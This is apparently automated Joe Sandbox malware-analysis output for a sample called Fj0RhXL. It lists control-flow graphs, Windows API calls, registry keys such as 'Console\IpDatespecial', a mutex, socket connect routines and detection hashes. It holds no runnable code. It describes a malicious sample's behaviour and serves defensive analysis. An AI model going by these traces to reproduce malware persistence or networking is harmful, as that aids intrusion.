                                          control_flow_graph 1121 6c3d5aca-6c3d5adc call 6c3d7820 1124 6c3d5ade call 6c3de3bd 1121->1124 1125 6c3d5b58-6c3d5b5c 1121->1125 1133 6c3d5ae3-6c3d5ae5 1124->1133 1127 6c3d5b5e-6c3d5b64 1125->1127 1128 6c3d5bb9-6c3d5bbc 1125->1128 1131 6c3d5ae7-6c3d5ae9 1127->1131 1132 6c3d5b66-6c3d5b75 1127->1132 1129 6c3d5bbe-6c3d5bca call 6c3d8faa call 6c3d7abf 1128->1129 1130 6c3d5c17-6c3d5c1a 1128->1130 1158 6c3d5bcf-6c3d5bd5 1129->1158 1136 6c3d5c1c-6c3d5c22 call 6c3d92ae 1130->1136 1137 6c3d5c23-6c3d5c25 1130->1137 1138 6c3d5c26-6c3d5c2b call 6c3d7865 1131->1138 1139 6c3d5b7c-6c3d5b7f 1132->1139 1140 6c3d5b77 call 6c3d2e5f 1132->1140 1133->1131 1134 6c3d5aee-6c3d5af5 call 6c3d9328 1133->1134 1154 6c3d5afe-6c3d5b1f call 6c3db49b GetCommandLineA call 6c3e0a9d call 6c3d7556 1134->1154 1155 6c3d5af7-6c3d5afc call 6c3de3db 1134->1155 1136->1137 1137->1138 1142 6c3d5b81-6c3d5b8b call 6c3d779b call 6c3d8ffb call 6c3de3db 1139->1142 1143 6c3d5b90-6c3d5b9c call 6c3d5ba3 1139->1143 1140->1139 1142->1143 1143->1137 1177 6c3d5b28-6c3d5b2f call 6c3e09e2 1154->1177 1178 6c3d5b21-6c3d5b26 call 6c3d8ffb 1154->1178 1155->1131 1158->1131 1159 6c3d5bdb-6c3d5bf2 1158->1159 1172 6c3d5c0b-6c3d5c12 call 6c3d355f 1159->1172 1173 6c3d5bf4-6c3d5c09 call 6c3d9038 GetCurrentThreadId 1159->1173 1172->1131 1173->1137 1185 6c3d5b51-6c3d5b56 call 6c3d779b 1177->1185 1186 6c3d5b31-6c3d5b38 call 6c3e075d 1177->1186 1178->1155 1185->1178 1186->1185 1191 6c3d5b3a-6c3d5b44 call 6c3d2c5c 1186->1191 1191->1185 1194 6c3d5b46-6c3d5b4c 1191->1194 1194->1137
                                          APIs
                                          • __heap_init.LIBCMT ref: 6C3D5ADE
                                            • Part of subcall function 6C3DE3BD: HeapCreate.KERNEL32(00000000,00001000,00000000,6C3D5AE3,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3DE3C6
                                          • __RTC_Initialize.LIBCMT ref: 6C3D5AFE
                                          • GetCommandLineA.KERNEL32(6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D5B03
                                          • ___crtGetEnvironmentStringsA.LIBCMT ref: 6C3D5B0E
                                            • Part of subcall function 6C3E0A9D: GetEnvironmentStringsW.KERNEL32(?,?), ref: 6C3E0AA7
                                          • __ioinit.LIBCMT ref: 6C3D5B18
                                            • Part of subcall function 6C3D7556: GetStartupInfoW.KERNEL32(?), ref: 6C3D7563
                                            • Part of subcall function 6C3D7556: __calloc_crt.LIBCMT ref: 6C3D756F
                                          • __ioterm.LIBCMT ref: 6C3D5B51
                                            • Part of subcall function 6C3D779B: DeleteCriticalSection.KERNEL32(0000000D,00000000,?,6C3D5B86,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D77BE
                                            • Part of subcall function 6C3D779B: _free.LIBCMT ref: 6C3D77D7
                                          • __mtterm.LIBCMT ref: 6C3D5B21
                                            • Part of subcall function 6C3D8FFB: DecodePointer.KERNEL32(00000006,6C3D5BB6,6C3D5B9C,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D900C
                                            • Part of subcall function 6C3D8FFB: TlsFree.KERNEL32(00000014,6C3D5BB6,6C3D5B9C,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D9026
                                          • __setargv.LIBCMT ref: 6C3D5B28
                                          • __setenvp.LIBCMT ref: 6C3D5B31
                                          • __cinit.LIBCMT ref: 6C3D5B3C
                                          • __ioterm.LIBCMT ref: 6C3D5B81
                                          • __mtterm.LIBCMT ref: 6C3D5B86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings__ioterm__mtterm$CommandCreateCriticalDecodeDeleteFreeHeapInfoInitializeLinePointerSectionStartup___crt__calloc_crt__cinit__heap_init__ioinit__setargv__setenvp_free
                                          • String ID: PNv
                                          • API String ID: 2991414096-4070351811
                                          • Opcode ID: 172cb925bc8e6187254615f44d767fce466aec4561e8a127e04b587f1e32c85b
                                          • Instruction ID: 8d5c63a71aeefdcd6ca6d24338035ccbe65135897e4675c9c045e606872fa846
                                          • Opcode Fuzzy Hash: 172cb925bc8e6187254615f44d767fce466aec4561e8a127e04b587f1e32c85b
                                          • Instruction Fuzzy Hash: 6031B3B364975586DA12BBB5A90458E36B4EF0236CB230A17D8D0C2E50DF32F5498F73
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$_free$_strncmp
                                          • String ID: .;C:\Astrolog\$99.$asteroid No. %d (%s): $asteroid eph. file (%s): $jd %f < lower limit %f;$jd %f > upper limit %f;$moon eph. file (%s): $plan. COB No. %d (%s): $plan. moon No. %d (%s): $planets eph. file (%s): $s.%s$se1
                                          • API String ID: 1187704711-3796515
                                          • Opcode ID: 0d7016fa19dfbb9b21ccc1afefb61c7c4e514e0086cad3d5bb35e74e491887d5
                                          • Instruction ID: dfdeb3d3b6e114aeadeff79419a4eb6177ca3337bc51a14cc6aabddd74f92156
                                          • Opcode Fuzzy Hash: 0d7016fa19dfbb9b21ccc1afefb61c7c4e514e0086cad3d5bb35e74e491887d5
                                          • Instruction Fuzzy Hash: E212F871904A09CBDB21CF24D884BDA77F8FF86308F1046DAD4D997990EB319A88CF52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1368 3d959d0-3d959eb 1369 3d959ed-3d95a1b RegOpenKeyExW 1368->1369 1370 3d95a44-3d95a4f 1368->1370 1371 3d95a39-3d95a3e 1369->1371 1372 3d95a1d-3d95a33 RegQueryValueExW 1369->1372 1373 3d9651c-3d96522 call 3d812a0 1370->1373 1374 3d95a55-3d95a5c 1370->1374 1371->1370 1376 3d96525-3d9652b 1371->1376 1372->1371 1373->1376 1377 3d95aaa-3d95ab1 1374->1377 1378 3d95ca3-3d95d5b call 3d9abd2 call 3da53e0 call 3d99b72 call 3d9d960 call 3d9abd2 call 3d97be0 call 3d99b72 1374->1378 1377->1376 1381 3d95ab7-3d95ae9 call 3d9abd2 call 3da53e0 1377->1381 1424 3d95d61-3d95dae call 3d9d960 RegCreateKeyW 1378->1424 1425 3d95e22-3d95e49 call 3d9aef4 CloseHandle 1378->1425 1390 3d95aeb-3d95aff wsprintfW 1381->1390 1391 3d95b02-3d95b0e 1381->1391 1390->1391 1393 3d95b5a-3d95bb1 call 3d99b72 call 3d9d960 call 3d82bf0 call 3d9a490 * 2 1391->1393 1394 3d95b10 1391->1394 1397 3d95b14-3d95b1f 1394->1397 1400 3d95b20-3d95b26 1397->1400 1404 3d95b28-3d95b2b 1400->1404 1405 3d95b46-3d95b48 1400->1405 1408 3d95b2d-3d95b35 1404->1408 1409 3d95b42-3d95b44 1404->1409 1410 3d95b4b-3d95b4d 1405->1410 1408->1405 1413 3d95b37-3d95b40 1408->1413 1409->1410 1414 3d95b4f-3d95b58 1410->1414 1415 3d95bb4-3d95bc9 1410->1415 1413->1400 1413->1409 1414->1393 1414->1397 1418 3d95bd0-3d95bd6 1415->1418 1421 3d95bd8-3d95bdb 1418->1421 1422 3d95bf6-3d95bf8 1418->1422 1427 3d95bdd-3d95be5 1421->1427 1428 3d95bf2-3d95bf4 1421->1428 1423 3d95bfb-3d95bfd 1422->1423 1429 3d95bff-3d95c01 1423->1429 1430 3d95c6e-3d95ca0 call 3d9aef4 CloseHandle call 3d9a490 1423->1430 1445 3d95e0a-3d95e1f RegCloseKey call 3d9af94 1424->1445 1446 3d95db0-3d95dff call 3d99b72 call 3d86260 RegDeleteValueW RegSetValueExW 1424->1446 1427->1422 1434 3d95be7-3d95bf0 1427->1434 1428->1423 1435 3d95c03-3d95c0e call 3d9a490 1429->1435 1436 3d95c15-3d95c1c 1429->1436 1434->1418 1434->1428 1435->1436 1443 3d95c1e-3d95c29 call 3d9af94 1436->1443 1444 3d95c30-3d95c34 1436->1444 1443->1444 1452 3d95c45-3d95c69 call 3d9a4b0 1444->1452 1453 3d95c36-3d95c3f call 3d9a490 1444->1453 1445->1425 1446->1445 1464 3d95e01-3d95e07 call 3d9af94 1446->1464 1452->1393 1453->1452 1464->1445
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 03D95A13
                                          • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03D95A33
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: OpenQueryValue
                                          • String ID: %s_bin$Console$Console\0$IpDatespecial
                                          • API String ID: 4153817207-1338088003
                                          • Opcode ID: d735a43e01642058869e0debbe4e11af6795f53684919983d29c0000bd7a0eac
                                          • Instruction ID: d07195b85f353a9cf623c92cf6bc92dd80c41312340ce8dcf811676a191e780f
                                          • Opcode Fuzzy Hash: d735a43e01642058869e0debbe4e11af6795f53684919983d29c0000bd7a0eac
                                          • Instruction Fuzzy Hash: 3FC1E7B6A003009BFB11EF24EC45B6B73E9EF95714F080529F9499B281E775E914C7A2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1467 3d94b10-3d94b45 GdipGetImagePixelFormat 1468 3d94b4a-3d94b71 1467->1468 1469 3d94b47 1467->1469 1470 3d94b89-3d94b8f 1468->1470 1471 3d94b73-3d94b83 1468->1471 1469->1468 1472 3d94bab-3d94bc4 GdipGetImageHeight 1470->1472 1473 3d94b91-3d94ba1 1470->1473 1471->1470 1474 3d94bc9-3d94bec GdipGetImageWidth 1472->1474 1475 3d94bc6 1472->1475 1473->1472 1476 3d94bee 1474->1476 1477 3d94bf1-3d94c0e call 3d948f0 1474->1477 1475->1474 1476->1477 1480 3d94d15-3d94d1a 1477->1480 1481 3d94c14-3d94c28 1477->1481 1482 3d94f64-3d94f7a call 3d9a49b 1480->1482 1483 3d94d8f-3d94d97 1481->1483 1484 3d94c2e-3d94c47 GdipGetImagePaletteSize 1481->1484 1486 3d94eca-3d94f3b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 1483->1486 1487 3d94d9d-3d94dda GdipBitmapLockBits 1483->1487 1488 3d94c49 1484->1488 1489 3d94c4c-3d94c58 1484->1489 1493 3d94f41-3d94f43 1486->1493 1491 3d94e0a-3d94e37 1487->1491 1492 3d94ddc-3d94de1 1487->1492 1488->1489 1494 3d94c5a-3d94c65 call 3d94310 1489->1494 1495 3d94c72-3d94c7a 1489->1495 1502 3d94e39-3d94e4e call 3d9beef 1491->1502 1503 3d94e7f-3d94e9e GdipBitmapUnlockBits 1491->1503 1498 3d94e00-3d94e05 1492->1498 1499 3d94de3 1492->1499 1500 3d94f62 1493->1500 1501 3d94f45 1493->1501 1494->1495 1517 3d94c67-3d94c70 call 3da9880 1494->1517 1496 3d94c7c-3d94c8a call 3d9ab3e 1495->1496 1497 3d94c90-3d94c95 call 3d81280 1495->1497 1514 3d94c9a-3d94ca5 1496->1514 1518 3d94c8c-3d94c8e 1496->1518 1497->1514 1498->1482 1507 3d94deb-3d94dfe call 3d9ab04 1499->1507 1500->1482 1509 3d94f4d-3d94f60 call 3d9ab04 1501->1509 1522 3d94ec0-3d94ec5 call 3d81280 1502->1522 1523 3d94e50-3d94e57 1502->1523 1503->1493 1505 3d94ea4-3d94ea7 1503->1505 1505->1493 1507->1498 1526 3d94de5 1507->1526 1509->1500 1529 3d94f47 1509->1529 1520 3d94ca7-3d94ca9 1514->1520 1517->1520 1518->1520 1527 3d94cab-3d94cad 1520->1527 1528 3d94cd6-3d94cf0 GdipGetImagePalette 1520->1528 1522->1486 1523->1522 1530 3d94eac-3d94eb1 call 3d81280 1523->1530 1531 3d94e5e-3d94e7d 1523->1531 1532 3d94eb6-3d94ebb call 3d81280 1523->1532 1526->1507 1538 3d94ccc-3d94cd1 1527->1538 1539 3d94caf 1527->1539 1534 3d94cfb-3d94d00 1528->1534 1535 3d94cf2-3d94cf8 1528->1535 1529->1509 1530->1532 1531->1502 1531->1503 1532->1522 1540 3d94d0a-3d94d10 call 3d97970 1534->1540 1541 3d94d02-3d94d08 1534->1541 1535->1534 1538->1482 1542 3d94cb7-3d94cca call 3d9ab04 1539->1542 1540->1480 1541->1540 1543 3d94d1f-3d94d23 1541->1543 1542->1538 1551 3d94cb1 1542->1551 1546 3d94d60-3d94d89 call 3d94a40 SetDIBColorTable call 3d94fe0 1543->1546 1547 3d94d25 1543->1547 1546->1483 1549 3d94d28-3d94d58 1547->1549 1549->1549 1552 3d94d5a 1549->1552 1551->1542 1552->1546
                                          APIs
                                          • GdipGetImagePixelFormat.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94B3B
                                          • GdipGetImageHeight.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94BBC
                                          • GdipGetImageWidth.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94BE4
                                          • GdipGetImagePaletteSize.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94C3F
                                          • _malloc.LIBCMT ref: 03D94C80
                                            • Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
                                            • Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
                                            • Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83
                                          • _free.LIBCMT ref: 03D94CC0
                                          • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 03D94CE8
                                          • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 03D94D77
                                          • GdipBitmapLockBits.GDIPLUS(Function_000146F0,?,00000001,?,?,?,00000000), ref: 03D94DD2
                                          • _free.LIBCMT ref: 03D94DF4
                                          • _memcpy_s.LIBCMT ref: 03D94E43
                                          • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 03D94E90
                                          • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03DB67B0,00022009,?,00000000,?,00000000), ref: 03D94EEC
                                          • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 03D94F0C
                                          • GdipDrawImageI.GDIPLUS(00000000,Function_000146F0,00000000,00000000,?,00000000), ref: 03D94F27
                                          • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 03D94F34
                                          • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 03D94F3B
                                          • _free.LIBCMT ref: 03D94F56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                          • String ID: &
                                          • API String ID: 640422297-3042966939
                                          • Opcode ID: dd9925b03a97e67b471412e6bc84f7053da4b090b6e0d2505bae2dbd95b3424b
                                          • Instruction ID: cdfd8ccd2d155072f8722d5c98121843608df389ebf7aaf5717e694742691868
                                          • Opcode Fuzzy Hash: dd9925b03a97e67b471412e6bc84f7053da4b090b6e0d2505bae2dbd95b3424b
                                          • Instruction Fuzzy Hash: 67D153B5A00219DFDB24DF55DC84BAAB7B8FF48704F0485AEE60997201D734AE86CF64

                                          Control-flow Graph

                                          APIs
                                          • __EH_prolog3_catch_GS.LIBCMT ref: 6C353393
                                          • CreateMutexA.KERNEL32(00000000,00000000,MyProgramMutex,00000020), ref: 6C3533A1
                                          • GetLastError.KERNEL32 ref: 6C3533B1
                                          • __CxxThrowException@8.LIBCMT ref: 6C3533D1
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000334B,00000000,00000000,6C47A980), ref: 6C353433
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6C353451
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C35345C
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C353477
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C353484
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C353494
                                          • _memmove.LIBCMT ref: 6C3534AC
                                          • HeapCreate.KERNEL32(00040000,-000000C9,00000000), ref: 6C3534C5
                                            • Part of subcall function 6C3D2E33: _doexit.LIBCMT ref: 6C3D2E3F
                                          • HeapAlloc.KERNEL32(00000000,00000008,-000000C9), ref: 6C3534CF
                                          • _memmove.LIBCMT ref: 6C3534DC
                                          • GetDC.USER32(00000000), ref: 6C3534E5
                                          • EnumObjects.GDI32(00000000,00000002,00000000,00000000), ref: 6C3534F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Create$File$CloseHandleHeap_memmove$AllocEnumErrorException@8H_prolog3_catch_LastMutexObjectsReadSizeThreadThrow_doexit
                                          • String ID: 1wps$MyProgramMutex$_w8g
                                          • API String ID: 2890720275-2654228369
                                          • Opcode ID: 03afd97380544656ad7431d0fe0afc3b2b3dfeb6cfe4c66a5c598b3628de8c4e
                                          • Instruction ID: 57efa1ec88aff2ad4795f6340663797ec7b472815af0818e4185f87c9f2c254f
                                          • Opcode Fuzzy Hash: 03afd97380544656ad7431d0fe0afc3b2b3dfeb6cfe4c66a5c598b3628de8c4e
                                          • Instruction Fuzzy Hash: 9641BDB1A01218BBDB01AFB59C8DEEF7EBDEB0A315F600925F551A2640DB318D158BB1

                                          Control-flow Graph

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 03D82D8B
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 03D82D97
                                          • timeGetTime.WINMM ref: 03D82D9D
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 03D82DCA
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03D82DF6
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03D82E02
                                          • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03D82E21
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03D82E2D
                                          • gethostbyname.WS2_32(00000000), ref: 03D82E3B
                                          • htons.WS2_32(?), ref: 03D82E5D
                                          • connect.WS2_32(?,?,00000010), ref: 03D82E7B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                          • String ID: 0u
                                          • API String ID: 640718063-3203441087
                                          • Opcode ID: 7d0a34009549284c7590375a9c0d0b8b5fe06d623f62c9e2b88e5096630242e0
                                          • Instruction ID: c117ff9b50ae997970f5f624a7821b0b140639d764e7ed352e407a4d91abe926
                                          • Opcode Fuzzy Hash: 7d0a34009549284c7590375a9c0d0b8b5fe06d623f62c9e2b88e5096630242e0
                                          • Instruction Fuzzy Hash: 7E612272A40704EFE720EFA4DC45FABB7B8EF48B10F104A1DF655EB290D670A9058B64

                                          Control-flow Graph

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 02F02D8B
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02F02D97
                                          • timeGetTime.WINMM ref: 02F02D9D
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 02F02DCA
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02F02DF6
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02F02E02
                                          • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02F02E21
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02F02E2D
                                          • gethostbyname.WS2_32(00000000), ref: 02F02E3B
                                          • htons.WS2_32(?), ref: 02F02E5D
                                          • connect.WS2_32(?,?,00000010), ref: 02F02E7B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                          • String ID: 0u
                                          • API String ID: 640718063-3203441087
                                          • Opcode ID: 8643f094a6de5cdf1ca8e0e4792443bdca66ea26276c47ccd151f5cbf8bfdd33
                                          • Instruction ID: 6f66dca0d959dc1d005cb64657e9da3a9a357c5d8b07a9045bba1e57b47f0c20
                                          • Opcode Fuzzy Hash: 8643f094a6de5cdf1ca8e0e4792443bdca66ea26276c47ccd151f5cbf8bfdd33
                                          • Instruction Fuzzy Hash: 496146B1A40308AFE720DFA4DC85FAAB7B9FF49750F504519FA46E72C0D7B0A9148B64

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1972 3d87880-3d878d5 call 3da53e0 call 3d9b69b 1977 3d87931-3d87958 CoCreateInstance 1972->1977 1978 3d878d7-3d878de 1972->1978 1980 3d8795e-3d879b2 1977->1980 1981 3d87b52-3d87b5f lstrlenW 1977->1981 1979 3d878e0-3d878e2 call 3d87780 1978->1979 1985 3d878e7-3d878e9 1979->1985 1992 3d879b8-3d879d2 1980->1992 1993 3d87b3a-3d87b48 1980->1993 1983 3d87b71-3d87b80 1981->1983 1984 3d87b61-3d87b6b lstrcatW 1981->1984 1986 3d87b8a-3d87baa call 3d9a49b 1983->1986 1987 3d87b82-3d87b87 1983->1987 1984->1983 1989 3d8790b-3d8792f call 3d9b69b 1985->1989 1990 3d878eb-3d87909 lstrcatW * 2 1985->1990 1987->1986 1989->1977 1989->1979 1990->1989 1992->1993 1999 3d879d8-3d879e4 1992->1999 1993->1981 1994 3d87b4a-3d87b4f 1993->1994 1994->1981 2000 3d879f0-3d87a93 call 3da53e0 wsprintfW RegOpenKeyExW 1999->2000 2003 3d87b19-3d87b2f 2000->2003 2004 3d87a99-3d87aea call 3da53e0 RegQueryValueExW 2000->2004 2006 3d87b32-3d87b34 2003->2006 2008 3d87b0c-3d87b13 RegCloseKey 2004->2008 2009 3d87aec-3d87b0a lstrcatW * 2 2004->2009 2006->1993 2006->2000 2008->2003 2009->2008
                                          APIs
                                          • _memset.LIBCMT ref: 03D878BB
                                          • lstrcatW.KERNEL32(03DC4360,03DB5A64,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D878FD
                                          • lstrcatW.KERNEL32(03DC4360,03DB5FCC,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87909
                                          • CoCreateInstance.OLE32(03DB24B0,00000000,00000017,03DB64BC,?,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87950
